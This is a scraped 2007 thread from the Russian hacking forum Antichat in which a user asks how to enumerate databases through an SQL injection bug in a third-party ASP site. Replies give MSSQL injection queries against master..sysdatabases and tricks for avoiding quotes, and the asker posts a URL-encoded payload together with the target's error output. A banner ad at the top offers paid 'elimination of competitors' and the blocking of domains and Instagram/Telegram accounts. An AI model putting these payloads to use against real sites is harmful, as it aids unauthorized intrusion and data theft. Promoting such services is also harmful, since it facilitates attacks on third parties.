Форум АНТИЧАТ - MSSQL Injection вопрос

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
MSSQL Injection вопрос

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

MSSQL Injection вопрос

16.08.2007, 15:49

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

MSSQL Injection вопрос

Каким методом можно получить список существующих баз данных?

16.08.2007, 15:55

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

show databases;

__________________

16.08.2007, 16:03

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

Это не то. Мне через багу в скрипте надо узнать все существующие базы.

запрос типа .asp?ID=1'INJECTION

16.08.2007, 16:36

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

http://hack-shop.org.ru/board/showthread.php?t=24

Цитата:

select top 1 name from master..sysdatabases

16.08.2007, 16:55

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

спасибо, помог

Только что-то select top 2 start at 1 не пашет

на единицу ругается Incorrect syntax near '1'

16.08.2007, 17:27

ShAnKaR

Пачка маргарина

Регистрация: 14.07.2005

Сообщений: 964

Провел на форуме:
4646474

Репутация: 1424

Отправить сообщение для ShAnKaR с помощью ICQ

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

16.08.2007, 17:31

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

Цитата:

Сообщение от ShAnKaR

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

я знаю, но кавычки ставить нельзя.

16.08.2007, 17:58

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

select top 2 start at 1 не пашет

Запрос гласит вывести 2 строчки начиная с 1

16.08.2007, 17:59

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

я знаю, но кавычки ставить нельзя.

можно использывать order by checksum

#10

16.08.2007, 19:09

sh-smoker

Познающий

Регистрация: 13.01.2007

Сообщений: 35

Провел на форуме:
115804

Репутация: -12

-1+or+1=(select+top+1+start+at+2+name+from+master.. sysdatabases)--

ответ:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

/newsstory.asp, line 15

что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Proxy FAQ	foreva	Чужие Статьи	12	04.01.2008 12:15
SQL Injection: Modes of Attack, Defence, and Why It Matters	bxN5	Forum for discussion of ANTICHAT	1	09.04.2007 19:07
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход